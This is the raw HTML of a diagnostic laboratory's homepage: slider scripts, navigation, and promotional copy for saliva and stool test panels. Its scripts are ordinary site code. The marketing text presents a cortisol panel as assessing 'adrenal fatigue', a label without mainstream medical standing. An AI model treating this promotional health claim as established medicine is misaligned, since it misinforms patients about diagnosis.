menu-item-29048 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/gastrointestinal-health/">Gastrointestinal Health</a></li> <li id="menu-item-29805" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29805 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/bone-health/">Bone Health</a></li> <li id="menu-item-29806" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29806 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/food-sensitivity/">Food Sensitivity</a></li> <li id="menu-item-29050" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29050 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/custom-flexi-matrix/">Custom Flexi-Matrix</a></li> <li id="menu-item-29340" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29340 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/index-of-panels-tests/">Index of Panels &#038; Tests</a></li> </ul> </li> <li id="menu-item-29656" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-parent menu-item-29656 megamenu-first-element"><a href="https://www.diagnostechs.com/news-education/news-articles/">News &#038; Education</a><span class="menu-item-parent-toggle"></span> <ul class="sub-menu styled dl-submenu"> <li id="menu-item-29065" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29065 megamenu-first-element"><a href="https://www.diagnostechs.com/news-education/news-articles/">News &#038; Articles</a></li> <li id="menu-item-29062" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29062 megamenu-first-element"><a href="https://www.diagnostechs.com/news-education/newsletters/">Newsletters</a></li> <li id="menu-item-29383" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29383 megamenu-first-element"><a href="https://www.diagnostechs.com/news-education/literature-references/">Literature References</a></li> </ul> </li> <li id="menu-item-29098" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-parent menu-item-29098 megamenu-first-element"><a href="https://www.diagnostechs.com/about-us/">About Us</a><span class="menu-item-parent-toggle"></span> <ul class="sub-menu styled dl-submenu"> <li id="menu-item-29720" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29720 megamenu-first-element"><a href="https://www.diagnostechs.com/about-us/">About DiagnosTechs</a></li> <li id="menu-item-30105" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30105 megamenu-first-element"><a href="https://www.diagnostechs.com/about-us/medical-support/">Medical Support</a></li> <li id="menu-item-29307" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29307 megamenu-first-element"><a href="https://www.diagnostechs.com/about-us/technology/">Technology</a></li> <li id="menu-item-29753" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29753 megamenu-first-element"><a href="https://www.diagnostechs.com/about-us/testimonials/">Testimonials</a></li> <li id="menu-item-29099" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29099 megamenu-first-element"><a href="https://www.diagnostechs.com/about-us/careers/">Careers</a></li> <li id="menu-item-29097" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29097 megamenu-first-element"><a href="https://www.diagnostechs.com/contact-us/">Contact Us</a></li> </ul> </li> <li class="menu-item menu-item-search"><a href="#"></a><div class="minisearch"><form role="search" id="searchform" class="sf" action="https://www.diagnostechs.com/" method="GET"><input id="searchform-input" class="sf-input" type="text" placeholder="Search..." name="s"><span class="sf-submit-icon"></span><input id="searchform-submit" class="sf-submit" type="submit" value=""></form></div></li></ul> </nav> </div> </div> </header><!-- #site-header --> </div><!-- #site-header-wrapper --> <div id="main" class="site-main"> <div id="main-content" class="main-content"> <div class="preloader slideshow-preloader"><div class="preloader-spin"></div></div><div class="gem-slideshow"><link href="https://fonts.googleapis.com/css?family=Merriweather:700" rel="stylesheet" property="stylesheet" type="text/css" media="all"> <div id="rev_slider_2_1_wrapper" class="rev_slider_wrapper fullwidthbanner-container" data-source="gallery" style="margin:0px auto;background:transparent;padding:0px;margin-top:0px;margin-bottom:0px;"> <!-- START REVOLUTION SLIDER 5.4.8.2 fullwidth mode --> <div id="rev_slider_2_1" class="rev_slider fullwidthabanner" style="display:none;" data-version="5.4.8.2"> <ul> <!-- SLIDE --> <li data-index="rs-12" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-link="https://www.diagnostechs.com/our-tests/toxic-metals-and-elements-panels/" data-thumb="https://www.diagnostechs.com/wp-content/uploads/2019/04/iStock-499124759-e1556675735826-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="TME" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://www.diagnostechs.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" title="Mother and Daughter in the kitchen" width="1920" height="1484" data-lazyload="https://www.diagnostechs.com/wp-content/uploads/2019/04/iStock-499124759-e1556675735826.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" data-bgparallax="off" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- LAYER NR. 1 --> <div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-12-layer-1" data-x="['left','left','left','left']" data-hoffset="['-500','-301','-424','-575']" data-y="['top','top','top','top']" data-voffset="['462','460','378','269']" data-fontweight="['700','100','100','700']" data-width="['1000%','1622','1622','1623']" data-height="['90','90','90','62']" data-whitespace="nowrap" data-type="shape" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0,0,0,0.3);"> </div> <!-- LAYER NR. 2 --> <div class="tp-caption tp-resizeme" id="slide-12-layer-2" data-x="['left','left','left','left']" data-hoffset="['60','60','31','23']" data-y="['top','top','top','top']" data-voffset="['497','495','413','289']" data-fontsize="['36','36','36','18']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 36px; line-height: 22px; font-weight: 700; color: #ffffff; letter-spacing: 0px;font-family:Merriweather;">Try our new Toxic Metals and Elements Panels </div> </li> <!-- SLIDE --> <li data-index="rs-10" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-thumb="https://www.diagnostechs.com/wp-content/uploads/2018/06/Advancing-saliva-testing-since-1987-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="Adv. Saliva" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://www.diagnostechs.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="Advancing saliva testing since 1987" title="Advancing saliva testing since 1987" width="1920" height="777" data-lazyload="https://www.diagnostechs.com/wp-content/uploads/2018/06/Advancing-saliva-testing-since-1987.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" data-bgparallax="off" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- LAYER NR. 3 --> <div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-10-layer-1" data-x="['left','left','left','left']" data-hoffset="['-500','-301','-424','-575']" data-y="['top','top','top','top']" data-voffset="['462','460','378','269']" data-fontweight="['700','100','100','700']" data-width="['1000%','1622','1622','1623']" data-height="['90','90','90','62']" data-whitespace="nowrap" data-type="shape" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0,0,0,0.3);"> </div> <!-- LAYER NR. 4 --> <div class="tp-caption tp-resizeme" id="slide-10-layer-2" data-x="['left','left','left','left']" data-hoffset="['60','60','31','23']" data-y="['top','top','top','top']" data-voffset="['497','495','413','289']" data-fontsize="['36','36','36','24']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 36px; line-height: 22px; font-weight: 700; color: #ffffff; letter-spacing: 0px;font-family:Merriweather;">Advancing Saliva Testing Since 1987 </div> </li> <!-- SLIDE --> <li data-index="rs-11" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-thumb="https://www.diagnostechs.com/wp-content/uploads/2018/06/Dedicated-to-research-and-development-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="RnD" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://www.diagnostechs.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="Dedicated to Research and Development" title="Dedicated to Research and Development" width="1920" height="777" data-lazyload="https://www.diagnostechs.com/wp-content/uploads/2018/06/Dedicated-to-research-and-development.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" data-bgparallax="off" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- LAYER NR. 5 --> <div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-11-layer-1" data-x="['left','left','left','left']" data-hoffset="['-500','-301','-424','-575']" data-y="['top','top','top','top']" data-voffset="['462','460','378','269']" data-fontweight="['700','100','100','700']" data-width="['1000%','1622','1622','1623']" data-height="['90','90','90','62']" data-whitespace="nowrap" data-type="shape" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0,0,0,0.3);"> </div> <!-- LAYER NR. 6 --> <div class="tp-caption tp-resizeme" id="slide-11-layer-2" data-x="['left','left','left','left']" data-hoffset="['60','60','31','23']" data-y="['top','top','top','top']" data-voffset="['497','495','413','289']" data-fontsize="['36','36','36','22']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 36px; line-height: 22px; font-weight: 700; color: #ffffff; letter-spacing: 0px;font-family:Merriweather;">Dedicated to Research & Development </div> </li> <!-- SLIDE --> <li data-index="rs-7" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-thumb="https://www.diagnostechs.com/wp-content/uploads/2018/06/Committed-to-superior-service-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://www.diagnostechs.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="Superior Customer Service" title="Superior Customer Service" width="1920" height="777" data-lazyload="https://www.diagnostechs.com/wp-content/uploads/2018/06/Committed-to-superior-service.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" data-bgparallax="off" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- LAYER NR. 7 --> <div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-7-layer-1" data-x="['left','left','left','left']" data-hoffset="['-500','-301','-424','-575']" data-y="['top','top','top','top']" data-voffset="['462','460','378','269']" data-fontweight="['700','700','100','700']" data-width="['1000%','1622','1622','1623']" data-height="['90','90','90','62']" data-whitespace="nowrap" data-type="shape" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0,0,0,0.3);"> </div> <!-- LAYER NR. 8 --> <div class="tp-caption tp-resizeme" id="slide-7-layer-2" data-x="['left','left','left','left']" data-hoffset="['60','60','31','23']" data-y="['top','top','top','top']" data-voffset="['497','496','413','289']" data-fontsize="['36','36','36','24']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 36px; line-height: 22px; font-weight: 700; color: #ffffff; letter-spacing: 0px;font-family:Merriweather;">Committed to Superior Service </div> </li> </ul> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <div class="tp-bannertimer" style="height: 5px; background: rgba(0,0,0,0.15);"></div> </div> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <script type="text/javascript"> if (setREVStartSize!==undefined) setREVStartSize( {c: '#rev_slider_2_1', responsiveLevels: [1240,1024,778,480], gridwidth: [1240,1024,778,480], gridheight: [600,600,500,350], sliderLayout: 'fullwidth'}); var revapi2, tpj; (function() { if (!/loaded|interactive|complete/.test(document.readyState)) document.addEventListener("DOMContentLoaded",onLoad); else onLoad(); function onLoad() { if (tpj===undefined) { tpj = jQuery; if("off" == "on") tpj.noConflict();} if(tpj("#rev_slider_2_1").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_2_1"); }else{ revapi2 = tpj("#rev_slider_2_1").show().revolution({ sliderType:"standard", jsFileLocation:"//www.diagnostechs.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"fullwidth", dottedOverlay:"none", delay:9000, navigation: { keyboardNavigation:"off", keyboard_direction: "horizontal", mouseScrollNavigation:"off", mouseScrollReverse:"default", onHoverStop:"on", touch:{ touchenabled:"on", touchOnDesktop:"off", swipe_threshold: 75, swipe_min_touches: 50, swipe_direction: "horizontal", drag_block_vertical: false } , arrows: { style:"hesperiden", enable:true, hide_onmobile:true, hide_under:600, hide_onleave:true, hide_delay:200, hide_delay_mobile:1200, tmp:'', left: { h_align:"left", v_align:"center", h_offset:30, v_offset:0 }, right: { h_align:"right", v_align:"center", h_offset:30, v_offset:0 } } , bullets: { enable:true, hide_onmobile:true, hide_under:600, style:"hephaistos", hide_onleave:true, hide_delay:200, hide_delay_mobile:1200, direction:"horizontal", h_align:"center", v_align:"bottom", h_offset:0, v_offset:30, space:5, tmp:'' } }, responsiveLevels:[1240,1024,778,480], visibilityLevels:[1240,1024,778,480], gridwidth:[1240,1024,778,480], gridheight:[600,600,500,350], lazyType:"smart", parallax: { type:"mouse", origo:"slidercenter", speed:2000, speedbg:0, speedls:0, levels:[2,3,4,5,6,7,12,16,10,50,47,48,49,50,51,55], }, shadow:0, spinner:"off", stopLoop:"off", stopAfterLoops:-1, stopAtSlide:-1, shuffle:"off", autoHeight:"off", hideThumbsOnMobile:"off", hideSliderAtLimit:0, hideCaptionAtLimit:0, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", nextSlideOnWindowFocus:"off", disableFocusListener:false, } }); }; /* END OF revapi call */ }; /* END OF ON LOAD FUNCTION */ }()); /* END OF WRAPPING FUNCTION */ </script> <script> var htmlDivCss = unescape(".hesperiden.tparrows%20%7B%0A%09cursor%3Apointer%3B%0A%09background%3Argba%280%2C0%2C0%2C0.5%29%3B%0A%09width%3A40px%3B%0A%09height%3A40px%3B%0A%09position%3Aabsolute%3B%0A%09display%3Ablock%3B%0A%09z-index%3A100%3B%0A%20%20%20%20border-radius%3A%2050%25%3B%0A%7D%0A.hesperiden.tparrows%3Ahover%20%7B%0A%09background%3Argba%280%2C%200%2C%200%2C%201%29%3B%0A%7D%0A.hesperiden.tparrows%3Abefore%20%7B%0A%09font-family%3A%20%22revicons%22%3B%0A%09font-size%3A20px%3B%0A%09color%3Argb%28255%2C%20255%2C%20255%29%3B%0A%09display%3Ablock%3B%0A%09line-height%3A%2040px%3B%0A%09text-align%3A%20center%3B%0A%7D%0A.hesperiden.tparrows.tp-leftarrow%3Abefore%20%7B%0A%09content%3A%20%22%5Ce82c%22%3B%0A%20%20%20%20margin-left%3A-3px%3B%0A%7D%0A.hesperiden.tparrows.tp-rightarrow%3Abefore%20%7B%0A%09content%3A%20%22%5Ce82d%22%3B%0A%20%20%20%20margin-right%3A-3px%3B%0A%7D%0A.hephaistos%20.tp-bullet%20%7B%0A%09width%3A12px%3B%0A%09height%3A12px%3B%0A%09position%3Aabsolute%3B%0A%09background%3Argba%28153%2C%20153%2C%20153%2C%201%29%3B%0A%09border%3A3px%20solid%20rgba%28255%2C255%2C255%2C0.9%29%3B%0A%09border-radius%3A50%25%3B%0A%09cursor%3A%20pointer%3B%0A%09box-sizing%3Acontent-box%3B%0A%20%20%20%20box-shadow%3A%200px%200px%202px%201px%20rgba%28130%2C130%2C130%2C%200.3%29%3B%0A%7D%0A.hephaistos%20.tp-bullet%3Ahover%2C%0A.hephaistos%20.tp-bullet.selected%20%7B%0A%09background%3Argba%28255%2C%20255%2C%20255%2C%201%29%3B%0A%20%20%20%20border-color%3Argba%280%2C%200%2C%200%2C%201%29%3B%0A%7D%0A"); var htmlDiv = document.getElementById('rs-plugin-settings-inline-css'); if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; } else{ var htmlDiv = document.createElement('div'); htmlDiv.innerHTML = '<style>' + htmlDivCss + '</style>'; document.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]); } </script> </div><!-- END REVOLUTION SLIDER --></div> <div class="block-content no-bottom-margin"> <div class="container"> <div class="panel row"> <div class="panel-center col-xs-12"> <article id="post-30341" class="post-30341 page type-page status-publish hentry"> <div class="entry-content post-content"> <div id="vc_row-5cdd8fcbb785f" class="vc_row wpb_row vc_row-fluid vc_row-o-content-middle vc_row-flex"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1530665233960"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p style="text-align: center;"><span style="color: #ff0000; font-size: 14pt;"><strong>In observance of Memorial Day, DiagnosTechs will be closed on Monday, May 27<sup>th</sup>.</strong></span></p> </div> </div> <div class="clearboth"></div><div class="gem-divider " style=""></div></div></div></div></div> <p>&nbsp;</p> <div class="vc_row-full-width-before"></div><div id="vc_row-5cdd8fcbbb54f" data-vc-full-width="true" data-vc-full-width-init="false" class="vc_row wpb_row vc_row-fluid vc_custom_1556136346473 vc_row-has-fill"><script type="text/javascript">if (typeof(gem_fix_fullwidth_position) == "function") { gem_fix_fullwidth_position(document.getElementById("vc_row-5cdd8fcbbb54f")); }</script><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1556136918867"><div class="wpb_wrapper"> <div class="wpb_raw_code wpb_content_element wpb_raw_html vc_custom_1556675119344" id="d2-slidebanner"> <div class="wpb_wrapper"> <a title="Toxic Metals and Elements" href="https://www.diagnostechs.com/our-tests/toxic-metals-and-elements-panels/"><div class="d2-slidebanner2"><img src="/wp-content/uploads/2019/04/tme-icon.svg" alt="TME Icon" width="92" height="92" /><div><h2 style="">Introducing</h2><p style="">the first ever salivary test to assess toxic metal exposure.</p></div></div></a> </div> </div> </div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div class="vc_row-full-width-before"></div><div id="vc_row-5cdd8fcbbb54f" data-vc-full-width="true" data-vc-full-width-init="false" class="vc_row wpb_row vc_row-fluid custom-image d2-layout vc_custom_1556645378807 vc_row-has-fill"><script type="text/javascript">if (typeof(gem_fix_fullwidth_position) == "function") { gem_fix_fullwidth_position(document.getElementById("vc_row-5cdd8fcbbb54f")); }</script><div class="wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6 vc_col-md-12"><div class="vc_column-inner vc_custom_1478783677232"><div class="wpb_wrapper"> <div class="wpb_raw_code wpb_content_element wpb_raw_html" > <div class="wpb_wrapper"> <p class="tme-intro">Toxic Metal Exposure</p> <p>Dangerous levels of heavy metals and elements may build up in the body over time as a result of environmental factors including:</p> </div> </div> <div class="vc_empty_space" style="height: 340px" ><span class="vc_empty_space_inner"></span></div> <div class="wpb_raw_code wpb_content_element wpb_raw_html" > <div class="wpb_wrapper"> <a class="learnmore-button" href="https://www.diagnostechs.com/our-tests/toxic-metals-and-elements-panels/">Learn More About TME</a> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p><span style="display: block; color: black; font-size: 16pt; line-height: 22pt; font-weight: bold; font-family: Montserrat, sans-serif;"><span style="color: #1a8fcb;">DiagnosTechs</span> is a Clinical &amp; Research Laboratory that provides non-invasive testing options for healthcare providers and their patients.</span></p> </div> </div> <div class="clearboth"></div><div class="gem-divider " style="margin-top: 26px;"></div> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p>DiagnosTechs was the first laboratory to introduce saliva testing for cortisol into routine practice. Building on that innovation, we now provide noninvasive saliva and stool test panels for a range of hormones, food sensitivities, microbes, pathogens, and parasites.</p> </div> </div> <div class="clearboth"></div><div class="gem-divider " style="margin-top: 30px;"></div> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <div class="title-h4">The DiagnosTechs Difference</div> </div> </div> <div class="gem-textbox" ><div class="gem-textbox-inner" style="border: 1px solid #cccccc;"><div class="gem-textbox-content" style="background-position: center top;padding-top: 8px;padding-bottom: 16px;"><div class="gem-dropcap gem-dropcap-shape-circle gem-dropcap-style-medium"><span class="gem-dropcap-letter" style="color: #ffffff;background-color: #008fd0;">1</span></div><div class="clearboth"></div><div class="gem-divider " style="margin-top: -52px;"></div> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p><span style="color: #008fd0;"><strong>Expertise.</strong> For more than 30 years, we have employed scientific experts to design and prove our testing methodologies.</span></p> </div> </div> </div></div></div><div class="gem-textbox" ><div class="gem-textbox-inner" style="border: 1px solid #cccccc;"><div class="gem-textbox-content" style="background-position: center top;padding-top: 8px;padding-bottom: 16px;"><div class="gem-dropcap gem-dropcap-shape-circle gem-dropcap-style-medium"><span class="gem-dropcap-letter" style="color: #ffffff;background-color: #00a4ef;">2</span></div><div class="clearboth"></div><div class="gem-divider " style="margin-top: -52px;"></div> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p><span style="color: #00a4ef;"><strong>Technology.</strong> From the lab to our research and development department, we seek and utilize the most advanced technology.</span></p> </div> </div> </div></div></div><div class="gem-textbox" ><div class="gem-textbox-inner" style="border: 1px solid #cccccc;"><div class="gem-textbox-content" style="background-position: center top;padding-top: 8px;padding-bottom: 16px;"><div class="gem-dropcap gem-dropcap-shape-circle gem-dropcap-style-medium"><span class="gem-dropcap-letter" style="color: #ffffff;background-color: #2ab6f6;">3</span></div><div class="clearboth"></div><div class="gem-divider " style="margin-top: -52px;"></div> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p><span style="color: #2ab6f6;"><strong>Superior Service.</strong> We pride ourselves on our professional relationships, personalized service, accuracy, and speed.</span></p> </div> </div> </div></div></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div id="vc_row-5cdd8fcbbb54f" class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="clearboth"></div><div class="gem-divider " style="margin-top: 20pxpx;margin-bottom: 20pxpx;"></div></div></div></div></div><div id="vc_row-5cdd8fcbbb54f" class="vc_row wpb_row vc_row-fluid vc_custom_1477486216071"><div class="custom-qf wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div id="fullwidth-block-5cdd8fcbbf240" class="fullwidth-block fullwidth-block-parallax-vertical clearfix" data-mobile-parallax-enable="0" style=""><script type="text/javascript">if (typeof(gem_fix_fullwidth_position) == "function") { gem_fix_fullwidth_position(document.getElementById("fullwidth-block-5cdd8fcbbf240")); }</script><div class="fullwidth-block-background" style="background-image: url(https://www.diagnostechs.com/wp-content/uploads/2016/10/3-1.jpg);background-repeat: no-repeat; background-size: cover;background-position: center top;"></div><div class="fullwidth-block-inner"><div class="container"><div class="clearboth"></div><div class="gem-divider " style="margin-top: 139px;"></div> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <h2 class="title-h2" style="text-align: center;"><span style="color: #00a4ef;">Lab-Proven Diagnostic Testing</span></h2> </div> </div> <div class="clearboth"></div><div class="gem-divider " style="margin-top: 33px;"></div> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p style="text-align: center; max-width: 832px; margin: 0 auto;">Saliva holds an amazing amount of biological information &#8211; discoveries are being made at an accelerating pace. DiagnosTechs was the first company to introduce cortisol saliva testing to routine practice, and we continue to innovate. Over the years, we have developed an array of saliva and stool tests for hormones, food sensitivities, microbes, and parasites. Each DiagnosTechs test reflects our commitment to noninvasive testing.</p> </div> </div> <div class="clearboth"></div><div class="gem-divider " style="margin-top: -12px;"></div><div class="quickfinder quickfinder-style-iconed row inline-row quickfinder-icon-position-top quickfinder-alignment-center quickfinder-title-bold" data-hover-box-color="#00a4ef" data-hover-title-color="#ffffff" data-hover-description-color="#ffffff"><div id="post-28338" class="quickfinder-item inline-column col-md-4 col-sm-6 col-xs-12 quickfinder-item-effect-image-scale icon-size-medium quickfinder-box-style-solid post-28338 thegem_qf_item type-thegem_qf_item status-publish has-post-thumbnail hentry"> <div class="quickfinder-item-box" style="background-color: #ffffff;"> <div class="quickfinder-item-inner"> <div class="quickfinder-item-image"> <div class="quickfinder-item-image-content" > <div class="quickfinder-item-image-wrapper quickfinder-item-picture quickfinder-item-image-shape-circle" style=""> <img width="250" height="250" src="https://www.diagnostechs.com/wp-content/uploads/2016/10/ASI-Icon.png" class=" quickfinder-img-size-medium wp-post-image" alt="ASI-Icon" srcset="https://www.diagnostechs.com/wp-content/uploads/2016/10/ASI-Icon-thegem-person-80.png 1x, https://www.diagnostechs.com/wp-content/uploads/2016/10/ASI-Icon-thegem-person-160.png 2x" sizes="100vw" /> </div> </div> </div> <div class="quickfinder-item-info-wrapper"> <div class="quickfinder-item-info " > <div class="quickfinder-item-title" >Adrenal Stress Index</div> <div class="quickfinder-item-text" >Our original cortisol test panel, continually refined to deliver a 24-hour hormone snapshot understanding of cortisol production and adrenal fatigue.</div> </div> </div> </div> </div> <a href="https://www.diagnostechs.com/our-tests/adrenal-stress/" target="_self" class="quickfinder-item-link"></a> </div> <div id="post-28344" class="quickfinder-item inline-column col-md-4 col-sm-6 col-xs-12 quickfinder-item-effect-image-scale icon-size-medium quickfinder-box-style-solid post-28344 thegem_qf_item type-thegem_qf_item status-publish has-post-thumbnail hentry"> <div 